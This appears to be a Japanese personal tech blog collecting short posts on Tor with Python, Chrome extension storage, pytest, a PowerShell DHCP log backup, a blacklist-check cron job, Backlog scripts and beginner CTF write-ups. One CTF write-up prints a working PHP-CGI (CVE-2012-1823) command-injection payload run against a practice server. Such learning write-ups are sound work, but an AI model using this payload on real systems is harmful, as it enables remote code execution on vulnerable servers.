基本設定 実行環境 Ubuntu 20.04LTS Tor version 0.4.2.7. Python 3.8.10 Torのインストール＆実行 $ sudo apt install tor Torを一時的に使う（起動する）場合 $ tor ```bash 止めたい場合は、Ctrl + c - Torを常時動かす場合 ```bash $ sudo service tor start Torを止める場合 $ sudo service tor stop Pythonモジュールのインストール $ pip install pysocks pysocksを入れないと下記のエラーが出る。 pythonコード内ではimportしていないのでハマりポイント。 requests.exceptions.InvalidSchema: Missing dependencies for SOCKS support. PythonからTor経由あり・なしでアクセスする import requests # importは不要だがpysocksのモジュールを事前にインストールしておく必要あり proxies = { "http": "socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050" } # Torを使用した場合 print("Torあり") print(requests.

ストレージを増やす Chrome拡張機能を開発中に、急にデータの保存が効かなくなり以下のエラーが出ていた。 Unchecked runtime.lastError: QUOTA_BYTES quota exceeded もともとchrom.storage.sync.setで保存していたのだが、どうやら一つのキーに対して保存できるのは8KBまでらしく、 それ以上の保存をしたい場合、保存先の変更と拡張が必要らしい。 拡張方法 作成しているchrome拡張機能のmanifest.jsonのpermissionsにunlimitedStorageを追加する。 "permissions": [ "storage", "unlimitedStorage" ], そして、chrome.storage.sync→chrome.storage.localに変更 //chrome.storage.sync.set({ key: value}) chrome.storage.local.set({ key: value}) これで同期機能は使えなくなったが、8KB上限はなくなった。 ストレージを確認する拡張機能を使う 今まで保存した内容を確認するのに以下のようなコードを打っていたが、 毎回打つのは面倒だし、使い勝手は良くなかった。 chrome.storage.sync.get(null, ((data) => {console.log(data)})); 調べてみるとchrome.storageを確認する拡張機能を見つけた。 コンソール画面から遷移して確認するが、コードを打たなくて良いのでかなり楽である。

読み進めた本 テスト駆動Python [asin:B07F65PFZN:detail] pytest とは何か ソフトウェアテストフレームワーク。 既存の unittest/nose などと比較して、テストが読みやすい。 単純なテストを書くのが簡単。 複雑なテストを書くのも簡単。 unittest/nose のテストを pytest でも実行できる。 サンプルソース 本書のコードは公開されている。 ※もちろんこれだけでは意味が分からないので、本の購入は必要。 [https://pragprog.com/titles/bopytest] 本書のサンプルコードを実行するにあたり作成した環境 私個人の実行環境であり、本の内容とは関係ない。 Windows の WSL2 環境で検証。 WSL2 の中身は Ubuntu。 $ cat /etc/os-release NAME="Ubuntu" VERSION="20.04.1 LTS (Focal Fossa)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 20.04.1 LTS" VERSION_ID="20.04" $ python -V;pipenv --version;pytest --version Python 3.8.2 pipenv, version 2020.8.13 pytest 6.1.0 pipenv を利用した仮想環境の場合 各個人の環境に依存。 私の場合は、今回はpipenvを利用して仮想環境を構築した。 $ pip3 install pipenv --user $ pipenv install pytest ##### pipenv の設定 ##### #.

目的 WindowsServerのDHCPログは一週間分しか保持されない。 仕様により曜日ごとにログが生成され、一週間経つと上書きされてしまう。 そのため一日一回前日のログを別フォルダに日付名で保存させることでログを保全する。 使い方 ログの保全先フォルダを作成（以下スクリプトではC:\Windows\System32\dhcp\を指定） WindowsServerのタスクスケジューラで一日一回実行してください。 コード Powershellで実装。 # 機能 # WindowsServerのDHCPログを別フォルダに一日一回コピーする # # 目的 # WindowsServerのDHCPログは一週間分しか保持されない。 # 曜日ごとにログが生成され、一週間経つと上書きされてしまう。 # そのため一日一回前日のログを別フォルダに日付名で保存させることでログを保全する。 # # 使い方 # タスクスケジューラにこのバッチを一日一回セットする ## 参照先・保全先 $src_file_def = "C:\Windows\System32\dhcp\" # DHCPのデフォルトログの保存先 $dst_file_def = "C:\Windows\System32\dhcp\log\" # コピー先(保全先)のディレクトリ ## 前日の日付取得 $date = (Get-Date).AddDays(-1).ToString("yyyyMMdd"); ## コピー先(保全先)のファイル名を生成 $dst_file = $dst_file_def + "$date" + ".log" ## コピー元のファイル名 $youbi = (Get-Date).AddDays(-1).DayOfWeek # 前日の曜日を取得 $youbi_3 = "$youbi".Substring(0,3) # 前日の曜日から頭３文字を抜き出す（Sunday→Sun） $src_file = $filename_def + "DhcpSrvLog-" + $youbi_3 +".

経緯 自身のグローバルIPがSPAMHAUSのブラックリストに載ってメールが送れなくなった。 今後すぐに気づけるようにcronを作成。 コード [https://gist.github.com/aa6d9b7937415a29332f393aaa4362d6:embed#指定したipがブラックリスト(SPAMHAUS)に載ったらメールを送る] 指定したipがブラックリスト(SPAMHAUS)に載ったらメールを送る 環境 Linux系サーバを想定 。 mailコマンドでメールが送れること。 クーロン設定（定期実行） 以下コマンドで編集。 crontab -e # 30分ごとに確認 */30 * * * * /home/hoge/blacklist_ip_check.sh 注意 IPアドレスがブラックリストに載ったとき、それがcronを動かしているサーバ自体だとメールが迷惑メール扱いになって届かないかもしれない。 なのでサーバを分けるか、受信サーバ側で強制的に受け取る設定にする必要がある。

概要 Backlogのwikiに貼った画像が、横幅いっぱいに表示されてとても見にくいので、 自動で画像を縮小してくれる仕組みを作りました。 やり方 1. ChromeにScriptAutoRunnerをインストール 任意のドメインで任意のJavascriptを実行できる。 本当に重宝する。便利。 2. ScriptをScriptAutoRunnerにペースト [https://gist.github.com/0d4467755d11ada196a4097c1f8dab89:embed#Backlogのwikiの画像はでかすぎるから良い感じにする] Backlogのwikiの画像はでかすぎるから良い感じにする ドメインの設定も忘れずに。 設定するとこんな感じになります。 これで設定完了です。 あとはBacklogで大きい画像が表示されると、自動でリサイズされます。 その他 一番良いのはBacklogのサービス側でwidthを整えてくれることですね。 あと、この方法は自分の表示が見やすくなっても、他の人は見にくいままなので、無闇に大きい画像を貼るのはやっぱりやめたほうが良い。

仕様 Backlogのカテゴリーを選択時に、予め設定したテンプレートを挿入する。 動作 動きを見たらどんなものかわかるはず。 ここが便利 チームで同じテンプレートが使え、自動で更新される テンプレートはURLで読み込んで都度表示させるので、 BacklogのGitで管理して、テンプレートを更新（プッシュ）すれば、自動で全員更新される。 導入方法 1. Chromeの拡張機能（ScriptAutoRunner）をインストール 特定のページで設定したJavascriptを実行してくれる拡張機能。 とっても重宝しています。 2. BacklogのGitにテンプレートをpush ## テスト 実際にインサートされる文章 ### その他 Gitに保存されたテンプレートの例 もしもGitがわからなければ、直接テンプレートをコードに書いてもOK 3. ScriptAutoRunnerに登録 ScriptAutoRunnerにコードを記入します このとき、どのURLで発火するかURLをAutoScriptRunnerに記入する。 上の図ではpepope.backlog.comの部分。 コード [https://gist.github.com/60ff5872b0820e744ac79ecfced3c0f6:embed#backlogのチケット作成時にカテゴリを選択すると自動でテンプレートが入る] 4. JavaScriptを環境に合わせて変更 サンプルではプロジェクトの追加時のパスを記載しています。 var projectName="TEST" // backlogのプロジェクト名を記入。大文字注意。 // テンプレートをbacklogのリポジトリにmarkdown形式で保存。 var template = [ ["カテゴリ１", "https://pepope.backlog.com/git/TEST/repo/raw/master/template1.md"], ["自分で設定しているカテゴリ名を記載", "https://pepope.backlog.com/git/TEST/repo/raw/master/template2.md"] ]; その他 スクリプトを作るよりも、ブログの記事にするほうが時間がかかる。 Backlogはとっても便利だけど、不便なところもあって、そこはアイディアで解決できる。 その他backlog関連で作ったもの

問題 ページを開いただけではよくわからない。 解き方 とりあえずグーグル先生に出てきた数字を聞いてみる。 すると徳丸先生の脆弱性情報が出てきた。 なるほど。数字の先頭の2012:1823はCVE（脆弱性番号）で、 phpの脆弱性らしい。 試しに、URLのクエリ文字列に「?-s」をつけるとソースコードが出てきた。 [http://ctfq.sweetduet.info:10080/~q12/?-s] ソースコードを見ると丁寧に「// Flag is in this directory.」と書かれているので、 次はOSインジェクションを試してみる。 「-d」をつけると任意のPHPコードが実行できるようなので、 参考サイトみながらちょろっとコードを書いて実行してみたらフラグをゲットできた。 # bash echo "<?php system('ls -al'); exit(); ?>" | POST "http://ctfq.sweetduet.info:10080/~q12/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" その他 初めはBurpを使ってクエリを書き換えていたが、bashから実行する方法がネットに載っていたので最終的にbashで答えを見つけた。 burpの使い方は慣れていないので練習が必要。 PHPの知識がなくても簡単にOSインジェクションができてしまったが、 PHPの勉強もしたい。 参考 https://blog.tokumaru.org/2012/05/php-cgi-remote-scripting-cve-2012-1823.htmlhttps://blog.tokumaru.org/2013/11/apache-magica-attack.html[https://pentesterlab.com/exercises/cve-2012-1823/course] [asin:B00E5TJ120:detail]

問題 xを満たすyがFLAGらしい。 解き方 問題を見たときはモジュロ演算なんて言葉は知らなかったけど、取りあえず累乗根を単純に計算するだけだと思った。 ささっと計算してみたらオーバーフローしてうまく動かない。 多分これは私の書き方とかそもそも論で何か間違っているのだろう。 y = pow (x,(1.00/101.00)) OverflowError: long int too large to convert to float どうすればいいのか調べていたら二分探索で解を得るのがベターらしい。 二分探索をやってみる 二分探索はここを参考にした。 二分探索と聞いたときは「基本情報でなんか見たかも」ぐらいな感じで、使ったことは一回もなかった。 # python3 import math x = ここに問題文の値を入れる y_min = 0 y_max = 10 ** 300 #ここは適当 y_jou = 101 for num in range(0,2000): # 2000も適当 mid = ( y_min + y_max ) // 2 dy = pow (mid , y_jou) if dy == x: print (mid) break elif dy > x: y_max = mid print ("大きすぎ") elif dy < x: y_min = mid print ("小さすぎ") keta = int(math.

スキルアップのためにCTF（キャッチ・ザ・フラグ）にチャレンジしてみました。 問題 50pt EBG K VVV vf n fvzcyr yrggre fhofgvghgvba pvcure gung ercynprf n yrggre jvgu gur yrggre KVVV yrggref nsgre vg va gur nycunorg. EBG KVVV vf na rknzcyr bs gur Pnrfne pvcure, qrirybcrq va napvrag Ebzr. Synt vf SYNTFjmtkOWFNZdjkkNH. Vafreg na haqrefpber vzzrqvngryl nsgre SYNT. ただ意味のわからないアルファベットが並んでいますが、 これを各々推測して中に含まれているフラグ（FLAG_******）をゲットするのが問題の意図です。 CTFの問題はバイナリ解析やプログラムの脆弱性を突くものなどもあり、様々なスキルが求められます。 解き方 仮説を立てる Easy Cipher = 「簡単な暗号」 問題文を見ると文字の区切り方が英文に似ています。 アルファベットを別文字に入れ替えたような暗号と仮定して一旦解いてみます。 vf → is ? n → a ?